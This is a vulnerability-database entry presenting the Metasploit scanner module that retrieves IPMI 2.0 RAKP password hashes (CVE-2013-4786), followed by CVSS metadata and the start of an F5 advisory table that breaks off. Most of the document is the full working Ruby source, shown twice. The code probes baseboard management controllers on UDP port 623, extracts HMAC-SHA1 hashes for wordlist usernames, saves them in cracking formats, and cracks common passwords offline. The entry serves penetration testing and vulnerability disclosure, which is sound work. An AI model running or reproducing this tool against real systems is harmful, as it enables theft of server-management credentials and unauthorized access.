ID MSF:AUXILIARY/SCANNER/IPMI/IPMI_DUMPHASHES Type metasploit Reporter Rapid7 Modified 2018-09-15T23:54:45
Description
This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well as hashcat (cpu) 0.46 or newer using type 7300.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/ipmi'
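# Scanner module for the IPMI 2.0 RMCP+ / RAKP password-hash exposure
# (CVE-2013-4786): the BMC's RAKP message 2 carries an HMAC-SHA1 over session
# material keyed with the requested user's password, so a reply to RAKP1 is
# enough to obtain a crackable hash for that user.
#
# Everything this module records — console output, the optional OUTPUT_* files
# and the credential/vuln records — is password-hash material and should be
# handled as sensitive data.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # All-zero HMAC-SHA1 value; some BMCs answer RAKP1 with this instead of a
  # real digest, and such replies are discarded rather than recorded.
  BOGUS_SHA1_HASH = '0000000000000000000000000000000000000000'.freeze

  # Minimum payload sizes accepted for an open-session reply and for a RAKP2
  # reply that carries hash data (thresholds from the original checks).
  MIN_OPEN_SESSION_DATA_LEN = 8
  MIN_RAKP2_DATA_LEN = 56

  # Receive timeout (seconds) per probe, retries per probe, and number of
  # full open-session/RAKP1 exchanges attempted per username.
  RECV_TIMEOUT = 5.0
  SEND_RETRIES = 3
  SESSION_ATTEMPTS = 5

  # Module metadata and operator-tunable options.
  #
  # Note: the Description text mentions an OUTPUT_FILE option; the options
  # actually registered below are OUTPUT_HASHCAT_FILE and OUTPUT_JOHN_FILE.
  def initialize
    super(
      'Name' => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval',
      'Description' => %q|
        This module identifies IPMI 2.0-compatible systems and attempts to retrieve the
        HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a
        file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb
        in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
      |,
      'Author' => [ 'Dan Farmer <zen[at]fish2.com>', 'hdm' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['URL', 'http://fish2.com/ipmi/remote-pw-cracking.html'],
          ['URL', 'https://seclists.org/bugtraq/2014/Apr/16'], # HP's SSRT101367
          ['CVE', '2013-4786'],
          ['OSVDB', '95057'],
          ['BID', '61076'],
        ],
      'DisclosureDate' => 'Jun 20 2013'
    )

    register_options(
      [
        Opt::RPORT(623),
        OptPath.new('USER_FILE', [ true, "File containing usernames, one per line",
          File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_users.txt')
        ]),
        OptPath.new('PASS_FILE', [ true, "File containing common passwords for offline cracking, one per line",
          File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_passwords.txt')
        ]),
        OptString.new('OUTPUT_HASHCAT_FILE', [false, "Save captured password hashes in hashcat format"]),
        OptString.new('OUTPUT_JOHN_FILE', [false, "Save captured password hashes in john the ripper format"]),
        OptBool.new('CRACK_COMMON', [true, "Automatically crack common passwords as they are obtained", true])
      ]
    )
  end

  # Framework classification hook; presumably marks the module as one that
  # exercises post-authentication behaviour. Always true here.
  def post_auth?
    true
  end

  # Framework classification hook; presumably marks the module as a
  # default-credential check. Always true here.
  def default_cred?
    true
  end

  # Verbose-only status line prefixed with the target address and port.
  def ipmi_status(msg)
    vprint_status("#{rhost}:#{rport} - IPMI - #{msg}")
  end

  # Verbose-only error line prefixed with the target address and port.
  def ipmi_error(msg)
    vprint_error("#{rhost}:#{rport} - IPMI - #{msg}")
  end

  # Always-printed success line prefixed with the target address and port.
  def ipmi_good(msg)
    print_good("#{rhost}:#{rport} - IPMI - #{msg}")
  end

  # Scanner entry point, called once per target host.
  #
  # For every username in USER_FILE (plus the empty name) the module opens an
  # RMCP+ session, sends RAKP message 1 and parses the RAKP message 2 reply,
  # whose HMAC-SHA1 field is the password hash. Each hash is printed, appended
  # to the OUTPUT_* files when configured, stored as a credential plus a vuln
  # record, and — when CRACK_COMMON is set — checked offline against every
  # password in PASS_FILE.
  #
  # @param ip [String] target address (unused; rhost/rport come from the datastore)
  # @return [void]
  def run_host(ip)
    ipmi_status("Sending IPMI probes")

    usernames = load_wordlist(datastore['USER_FILE']) { |line| line.strip }
    passwords = load_wordlist(datastore['PASS_FILE']) { |line| line.gsub(/\r?\n?/, '') }

    self.udp_sock = Rex::Socket::Udp.create({ 'Context' => { 'Msf' => framework, 'MsfExploit' => self } })
    add_socket(self.udp_sock)

    # The vuln record is written once per host, on the first hash obtained
    reported_vuln = false

    usernames.each do |username|
      # Fresh console-side session id and random nonce for every username
      console_session_id = Rex::Text.rand_text(4)
      console_random_id = Rex::Text.rand_text(16)

      ipmi_status("Trying username '#{username}'...")

      sess_data, rakp = negotiate_rakp2(username, console_session_id, console_random_id)
      # Skip to the next user if no usable RAKP2 reply was obtained
      next unless rakp

      # Rebuild the HMAC input (the "salt") from both sides' session material;
      # the 0x14 field is whatever create_rakp_hmac_sha1_salt expects there —
      # its meaning is defined by that helper, not here
      rakp_data = Rex::Proto::IPMI::RAKP2_Data.new.read(rakp.data)
      hmac_buffer = Rex::Proto::IPMI::Utils.create_rakp_hmac_sha1_salt(
        console_session_id,
        sess_data.bmc_session_id,
        console_random_id,
        rakp_data.bmc_random_id,
        rakp_data.bmc_guid,
        0x14,
        username
      )

      sha1_salt = hmac_buffer.unpack("H*")[0]
      sha1_hash = rakp_data.hmac_sha1.unpack("H*")[0]

      if sha1_hash == BOGUS_SHA1_HASH
        ipmi_error("Returned a bogus SHA1 hash for username #{username}")
        next
      end

      ipmi_good("Hash found: #{username}:#{sha1_salt}:#{sha1_hash}")

      write_output_files(rhost, username, sha1_salt, sha1_hash)

      # Store the hash in the database in john's $rakp$ format
      hash = "#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}"
      core_id = report_hash(username, hash)

      unless reported_vuln
        report_vuln(
          host: rhost,
          port: rport,
          proto: 'udp',
          sname: 'ipmi',
          name: 'IPMI 2.0 RMCP+ Authentication Password Hash Exposure',
          info: "Obtained password hash for user #{username}: #{sha1_salt}:#{sha1_hash}",
          refs: self.references
        )
        reported_vuln = true
      end

      # Offline-check common passwords and report any clear-text credential
      next unless datastore['CRACK_COMMON']

      crack_common(username, passwords, hmac_buffer, rakp_data.hmac_sha1, core_id)
    end
  end

  # Reads a wordlist line by line, normalising each line with the given block,
  # appends the empty string so a blank entry is always tried, and drops
  # duplicates.
  #
  # @param path [String] wordlist path from the datastore
  # @yieldparam line [String] raw line from the file
  # @yieldreturn [String] normalised entry
  # @return [Array<String>] unique entries, empty string included
  def load_wordlist(path)
    entries = []
    ::File.open(path, "rb") do |fd|
      fd.each_line { |line| entries << yield(line) }
    end
    entries << ""
    entries.uniq
  end

  # Drives the RMCP+ open-session / RAKP1 exchange for one username.
  #
  # Some BMCs (HP iLO 4, etc) need several tries before a session is usable,
  # so the whole exchange is attempted up to SESSION_ATTEMPTS times. A missing
  # RAKP1 reply or a Session ID error (RMCP+ error code 2) triggers another
  # attempt; any other failure abandons this username. Only a reply that
  # passed every check is returned, so a stale error reply from an earlier
  # attempt can never be mistaken for hash data.
  #
  # @param username [String]
  # @param console_session_id [String] 4 random bytes chosen by the console
  # @param console_random_id [String] 16 random bytes chosen by the console
  # @return [Array(Object, Object), nil] the parsed Session_Data and the RAKP2
  #   reply, or nil when no usable reply was obtained
  def negotiate_rakp2(username, console_session_id, console_random_id)
    1.upto(SESSION_ATTEMPTS) do |attempt|
      reply = send_with_retries(Rex::Proto::IPMI::Utils.create_ipmi_session_open_request(console_session_id))
      unless reply
        ipmi_status("No response to IPMI open session request")
        return nil
      end

      sess = process_opensession_reply(*reply)
      unless sess
        ipmi_status("Could not understand the response to the open session request")
        return nil
      end

      if sess.data.length < MIN_OPEN_SESSION_DATA_LEN
        ipmi_status("Refused IPMI open session request")
        return nil
      end

      sess_data = Rex::Proto::IPMI::Session_Data.new.read(sess.data)

      reply = send_with_retries(Rex::Proto::IPMI::Utils.create_ipmi_rakp_1(sess_data.bmc_session_id, console_random_id, username))
      unless reply
        ipmi_status("No response to RAKP1 message")
        next
      end

      rakp = process_rakp1_reply(*reply)
      unless rakp
        ipmi_status("Could not understand the response to the RAKP1 request")
        return nil
      end

      # Sleep and retry on session ID errors
      if rakp.error_code == 2
        ipmi_error("Returned a Session ID error for username #{username} on attempt #{attempt}")
        Rex.sleep(1)
        next
      end

      if rakp.error_code != 0
        ipmi_error("Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}")
        return nil
      end

      # TODO: Finish documenting this error field
      if rakp.ignored1 != 0
        ipmi_error("Returned error code #{rakp.ignored1} for username #{username}")
        return nil
      end

      # Too short to carry a full RAKP2 payload, so there is no hash to read
      return nil if rakp.data.length < MIN_RAKP2_DATA_LEN

      return [sess_data, rakp]
    end

    nil
  end

  # Sends one datagram up to SEND_RETRIES times and returns the first reply
  # received within RECV_TIMEOUT seconds (the tuple from udp_recv), or nil.
  #
  # @param data [String] packet to send
  # @return [Array, nil]
  def send_with_retries(data)
    SEND_RETRIES.times do
      udp_send(data)
      reply = udp_recv(RECV_TIMEOUT)
      return reply if reply
    end
    nil
  end

  # Compares the recovered HMAC against each candidate password and records
  # the first match as a cracked credential. Empty candidates are skipped.
  #
  # @param username [String]
  # @param passwords [Array<String>] candidate list from PASS_FILE
  # @param hmac_buffer [String] HMAC input rebuilt in run_host
  # @param hmac_sha1 [String] raw HMAC-SHA1 bytes from the RAKP2 reply
  # @param core_id [Integer, nil] credential core id from report_hash
  # @return [void]
  def crack_common(username, passwords, hmac_buffer, hmac_sha1, core_id)
    passwords.each do |candidate|
      pass = candidate.strip
      next if pass.empty?
      next unless Rex::Proto::IPMI::Utils.verify_rakp_hmac_sha1(hmac_buffer, hmac_sha1, pass)

      ipmi_good("Hash for user '#{username}' matches password '#{pass}'")
      # Report the clear-text credential to the database
      report_cracked_cred(username, pass, core_id)
      break
    end
  end

  # Parses a datagram as an RMCP+ Open Session reply.
  #
  # @param data [String] raw packet bytes
  # @param shost [String] sender address (unused)
  # @param sport [Integer] sender port (unused)
  # @return [Object, nil] the parsed reply when it decodes and carries the
  #   RMCP+ open-session payload type; nil on a parse error or any other payload
  def process_opensession_reply(data, shost, sport)
    info = begin
      Rex::Proto::IPMI::Open_Session_Reply.new.read(data)
    rescue ::StandardError
      nil
    end
    return unless info && info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RMCPPLUSOPEN_REP

    info
  end

  # Parses a datagram as a RAKP message 2 reply.
  #
  # @param data [String] raw packet bytes
  # @param shost [String] sender address (unused)
  # @param sport [Integer] sender port (unused)
  # @return [Object, nil] the parsed reply when it decodes and carries the
  #   RAKP2 payload type; nil on a parse error or any other payload
  def process_rakp1_reply(data, shost, sport)
    info = begin
      Rex::Proto::IPMI::RAKP2.new.read(data)
    rescue ::StandardError
      nil
    end
    return unless info && info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RAKP2

    info
  end

  # Appends the hash to the hashcat- and john-format output files, each only
  # when its option is set. The +rhost+ parameter shadows the reader method of
  # the same name; callers pass the target address explicitly.
  #
  # @param rhost [String] target address written at the start of each line
  # @param username [String]
  # @param sha1_salt [String] hex-encoded HMAC input
  # @param sha1_hash [String] hex-encoded HMAC-SHA1
  # @return [void]
  def write_output_files(rhost, username, sha1_salt, sha1_hash)
    append_line(datastore['OUTPUT_HASHCAT_FILE'], "#{rhost} #{username}:#{sha1_salt}:#{sha1_hash}")
    append_line(datastore['OUTPUT_JOHN_FILE'], "#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}")
  end

  # Appends one line to +path+ in binary append mode, flushing after the
  # write. Does nothing when the path is unset or blank (an unset OptString
  # would otherwise be opened as "").
  #
  # @param path [String, nil]
  # @param line [String] text without trailing newline
  # @return [void]
  def append_line(path, line)
    return if path.nil? || path.empty?

    ::File.open(path, "ab") do |fd|
      fd.write("#{line}\n")
      fd.flush
    end
  end

  # Service attributes shared by every credential and login record.
  #
  # @return [Hash]
  def service_data
    {
      address: rhost,
      port: rport,
      service_name: 'ipmi',
      protocol: 'udp',
      workspace_id: myworkspace_id
    }
  end

  # Stores the RAKP hash as a non-replayable credential (jtr format "rakp")
  # with an UNTRIED login against the IPMI service.
  #
  # @param user [String]
  # @param hash [String] hash line in "$rakp$salt$hash" form
  # @return [Integer, nil] core id of the created login, or nil if none was created
  def report_hash(user, hash)
    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      private_data: hash,
      private_type: :nonreplayable_hash,
      jtr_format: 'rakp',
      username: user,
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_data)

    login = create_credential_login(login_data)
    login ? login.core_id : nil
  end

  # Attaches a recovered clear-text password to an existing credential core.
  #
  # @param user [String]
  # @param password [String]
  # @param core_id [Integer, nil] id returned by report_hash
  # @return [Object] whatever create_cracked_credential returns
  def report_cracked_cred(user, password, core_id)
    create_cracked_credential(
      core_id: core_id,
      username: user,
      password: password
    )
  end

  #
  # Helper methods (these didn't quite fit with existing mixins)
  #

  # UDP socket created in run_host and registered with the framework via add_socket
  attr_accessor :udp_sock

  # Best-effort send of one datagram to rhost:RPORT. Send failures are
  # swallowed because the callers treat a missing reply as a timeout; only
  # StandardError is rescued, so Interrupt, SystemExit and the like propagate.
  #
  # @param data [String]
  # @return [Object, nil] sendto's result, or nil on a send error
  def udp_send(data)
    udp_sock.sendto(data, rhost, datastore['RPORT'], 0)
  rescue ::StandardError
    nil
  end

  # Waits up to +timeo+ seconds for one datagram.
  #
  # recvfrom is assumed to return a [data, host, port] tuple; a result whose
  # host element is empty or nil (the timeout case, as the original check
  # implies) is reported as nil.
  #
  # @param timeo [Float] seconds
  # @return [Array, nil]
  def udp_recv(timeo)
    reply = udp_sock.recvfrom(65535, timeo)
    reply[1] ? reply : nil
  end

  # Target host from the datastore.
  def rhost
    datastore['RHOST']
  end

  # Target port from the datastore.
  def rport
    datastore['RPORT']
  end
end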
{"id": "MSF:AUXILIARY/SCANNER/IPMI/IPMI_DUMPHASHES", "type": "metasploit", "bulletinFamily": "exploit", "title": "IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval", "description": "This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.\n", "published": "2013-06-23T04:38:28", "modified": "2018-09-15T23:54:45", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["http://fish2.com/ipmi/remote-pw-cracking.html", "https://seclists.org/bugtraq/2014/Apr/16", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4786"], "cvelist": ["CVE-2013-4786"], "lastseen": "2020-09-19T00:12:28", "viewCount": 3515, "enchantments": {"dependencies": {"references": [{"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97"]}, {"type": "cve", "idList": ["CVE-2013-4786"]}, {"type": "f5", "idList": ["F5:K16846", "SOL16846"]}, {"type": "jvn", "idList": ["JVN:38752718"]}, {"type": "nessus", "idList": ["IPMI_PASSHASH_DISCLOSURE.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2016V3", "ORACLE:CPUAPR2016V3-2985753"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30452", "SECURITYVULNS:VULN:13665"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-4786"]}]}, "score": {"value": 5.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97"]}, {"type": "canvas", "idList": ["ZEN"]}, {"type": "cve", "idList": ["CVE-2013-4786"]}, {"type": "f5", "idList": ["SOL16846"]}, {"type": "n0where", "idList": ["N0WHERE:161003", "N0WHERE:76327"]}, {"type": "nessus", "idList": ["IPMI_PASSHASH_DISCLOSURE.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13665"]}, {"type": 
"ubuntucve", "idList": ["UB:CVE-2013-4786"]}]}, "exploitation": null, "vulnersScore": 5.5}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/ipmi'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval',\n 'Description' => %q|\n This module identifies IPMI 2.0-compatible systems and attempts to retrieve the\n HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a\n file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb\n in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.\n |,\n 'Author' => [ 'Dan Farmer <zen[at]fish2.com>', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://fish2.com/ipmi/remote-pw-cracking.html'],\n ['URL', 'https://seclists.org/bugtraq/2014/Apr/16'], # HP's SSRT101367\n ['CVE', '2013-4786'],\n ['OSVDB', '95057'],\n ['BID', '61076'],\n ],\n 'DisclosureDate' => 'Jun 20 2013'\n )\n\n register_options(\n [\n Opt::RPORT(623),\n OptPath.new('USER_FILE', [ true, \"File containing usernames, one per line\",\n File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_users.txt')\n ]),\n OptPath.new('PASS_FILE', [ true, \"File containing common passwords for offline cracking, one per line\",\n File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_passwords.txt')\n ]),\n OptString.new('OUTPUT_HASHCAT_FILE', [false, \"Save captured password hashes in hashcat format\"]),\n OptString.new('OUTPUT_JOHN_FILE', [false, \"Save captured password hashes in john the ripper format\"]),\n OptBool.new('CRACK_COMMON', [true, \"Automatically crack common passwords as 
they are obtained\", true])\n ])\n\n end\n\n def post_auth?\n true\n end\n\n def default_cred?\n true\n end\n\n def ipmi_status(msg)\n vprint_status(\"#{rhost}:#{rport} - IPMI - #{msg}\")\n end\n\n def ipmi_error(msg)\n vprint_error(\"#{rhost}:#{rport} - IPMI - #{msg}\")\n end\n\n def ipmi_good(msg)\n print_good(\"#{rhost}:#{rport} - IPMI - #{msg}\")\n end\n\n def run_host(ip)\n\n ipmi_status(\"Sending IPMI probes\")\n\n usernames = []\n passwords = []\n\n # Load up our username list (save on open fds)\n ::File.open(datastore['USER_FILE'], \"rb\") do |fd|\n fd.each_line do |line|\n usernames << line.strip\n end\n end\n usernames << \"\"\n usernames = usernames.uniq\n\n # Load up our password list (save on open fds)\n ::File.open(datastore['PASS_FILE'], \"rb\") do |fd|\n fd.each_line do |line|\n passwords << line.gsub(/\\r?\\n?/, '')\n end\n end\n passwords << \"\"\n passwords = passwords.uniq\n\n self.udp_sock = Rex::Socket::Udp.create({'Context' => {'Msf' => framework, 'MsfExploit' => self}})\n add_socket(self.udp_sock)\n\n reported_vuln = false\n\n usernames.each do |username|\n console_session_id = Rex::Text.rand_text(4)\n console_random_id = Rex::Text.rand_text(16)\n\n ipmi_status(\"Trying username '#{username}'...\")\n\n rakp = nil\n sess = nil\n sess_data = nil\n\n # It may take multiple tries to get a working \"session\" on certain BMCs (HP iLO 4, etc)\n 1.upto(5) do |attempt|\n\n r = nil\n 1.upto(3) do\n udp_send(Rex::Proto::IPMI::Utils.create_ipmi_session_open_request(console_session_id))\n r = udp_recv(5.0)\n break if r\n end\n\n unless r\n ipmi_status(\"No response to IPMI open session request\")\n rakp = nil\n break\n end\n\n sess = process_opensession_reply(*r)\n unless sess\n ipmi_status(\"Could not understand the response to the open session request\")\n rakp = nil\n break\n end\n\n if sess.data.length < 8\n ipmi_status(\"Refused IPMI open session request\")\n rakp = nil\n break\n end\n\n sess_data = 
Rex::Proto::IPMI::Session_Data.new.read(sess.data)\n\n r = nil\n 1.upto(3) do\n udp_send(Rex::Proto::IPMI::Utils.create_ipmi_rakp_1(sess_data.bmc_session_id, console_random_id, username))\n r = udp_recv(5.0)\n break if r\n end\n\n unless r\n ipmi_status(\"No response to RAKP1 message\")\n next\n end\n\n rakp = process_rakp1_reply(*r)\n unless rakp\n ipmi_status(\"Could not understand the response to the RAKP1 request\")\n rakp = nil\n break\n end\n\n # Sleep and retry on session ID errors\n if rakp.error_code == 2\n ipmi_error(\"Returned a Session ID error for username #{username} on attempt #{attempt}\")\n Rex.sleep(1)\n next\n end\n\n if rakp.error_code != 0\n ipmi_error(\"Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}\")\n rakp = nil\n break\n end\n\n # TODO: Finish documenting this error field\n if rakp.ignored1 != 0\n ipmi_error(\"Returned error code #{rakp.ignored1} for username #{username}\")\n rakp = nil\n break\n end\n\n # Check if there is hash data\n if rakp.data.length < 56\n rakp = nil\n break\n end\n\n # Break out of the session retry code if we make it here\n break\n end\n\n # Skip to the next user if we didnt get a valid response\n next if !rakp\n\n # Calculate the salt used in the hmac-sha1 hash\n rakp_data = Rex::Proto::IPMI::RAKP2_Data.new.read(rakp.data)\n hmac_buffer = Rex::Proto::IPMI::Utils.create_rakp_hmac_sha1_salt(\n console_session_id,\n sess_data.bmc_session_id,\n console_random_id,\n rakp_data.bmc_random_id,\n rakp_data.bmc_guid,\n 0x14,\n username\n )\n\n sha1_salt = hmac_buffer.unpack(\"H*\")[0]\n sha1_hash = rakp_data.hmac_sha1.unpack(\"H*\")[0]\n\n if sha1_hash == \"0000000000000000000000000000000000000000\"\n ipmi_error(\"Returned a bogus SHA1 hash for username #{username}\")\n next\n end\n\n ipmi_good(\"Hash found: #{username}:#{sha1_salt}:#{sha1_hash}\")\n\n write_output_files(rhost, username, sha1_salt, sha1_hash)\n\n # Write the rakp hash to the database\n 
hash = \"#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}\"\n core_id = report_hash(username, hash)\n # Write the vulnerability to the database\n unless reported_vuln\n report_vuln(\n :host => rhost,\n :port => rport,\n :proto => 'udp',\n :sname => 'ipmi',\n :name => 'IPMI 2.0 RMCP+ Authentication Password Hash Exposure',\n :info => \"Obtained password hash for user #{username}: #{sha1_salt}:#{sha1_hash}\",\n :refs => self.references\n )\n reported_vuln = true\n end\n\n # Offline crack common passwords and report clear-text credentials\n next unless datastore['CRACK_COMMON']\n\n passwords.uniq.each do |pass|\n pass = pass.strip\n next unless pass.length > 0\n next unless Rex::Proto::IPMI::Utils.verify_rakp_hmac_sha1(hmac_buffer, rakp_data.hmac_sha1, pass)\n ipmi_good(\"Hash for user '#{username}' matches password '#{pass}'\")\n\n # Report the clear-text credential to the database\n report_cracked_cred(username, pass, core_id)\n break\n end\n end\n end\n\n def process_opensession_reply(data, shost, sport)\n shost = shost.sub(/^::ffff:/, '')\n info = Rex::Proto::IPMI::Open_Session_Reply.new.read(data) rescue nil\n return unless info && info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RMCPPLUSOPEN_REP\n info\n end\n\n def process_rakp1_reply(data, shost, sport)\n shost = shost.sub(/^::ffff:/, '')\n info = Rex::Proto::IPMI::RAKP2.new.read(data) rescue nil\n return unless info && info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RAKP2\n info\n end\n\n\n def write_output_files(rhost, username, sha1_salt, sha1_hash)\n if datastore['OUTPUT_HASHCAT_FILE']\n ::File.open(datastore['OUTPUT_HASHCAT_FILE'], \"ab\") do |fd|\n fd.write(\"#{rhost} #{username}:#{sha1_salt}:#{sha1_hash}\\n\")\n fd.flush\n end\n end\n\n if datastore['OUTPUT_JOHN_FILE']\n ::File.open(datastore['OUTPUT_JOHN_FILE'], \"ab\") do |fd|\n fd.write(\"#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}\\n\")\n fd.flush\n end\n end\n end\n\n def service_data\n {\n address: rhost,\n port: rport,\n 
service_name: 'ipmi',\n protocol: 'udp',\n workspace_id: myworkspace_id\n }\n end\n\n def report_hash(user, hash)\n credential_data = {\n module_fullname: self.fullname,\n origin_type: :service,\n private_data: hash,\n private_type: :nonreplayable_hash,\n jtr_format: 'rakp',\n username: user,\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_data)\n\n cl = create_credential_login(login_data)\n cl ? cl.core_id : nil\n end\n\n def report_cracked_cred(user, password, core_id)\n cred_data = {\n core_id: core_id,\n username: user,\n password: password\n }\n\n create_cracked_credential(cred_data)\n end\n\n #\n # Helper methods (these didn't quite fit with existing mixins)\n #\n\n attr_accessor :udp_sock\n\n def udp_send(data)\n begin\n udp_sock.sendto(data, rhost, datastore['RPORT'], 0)\n rescue ::Interrupt\n raise $!\n rescue ::Exception\n end\n end\n\n def udp_recv(timeo)\n r = udp_sock.recvfrom(65535, timeo)\n r[1] ? 
r : nil\n end\n\n def rhost\n datastore['RHOST']\n end\n\n def rport\n datastore['RPORT']\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "edition": 2, "scheme": null, "_state": {"dependencies": 1647589307, "score": 0}}
{"f5": [{"lastseen": "2019-04-30T18:21:13", "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| Not vulnerable1| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable1| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.3.0 - 11.6.1| Not vulnerable1| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.0.0 - 11.6.1| Not vulnerable1| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable1| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| Not vulnerable1| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not vulnerable1| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| Not vulnerable1| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.3.0 - 11.6.1| Not vulnerable1| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not 
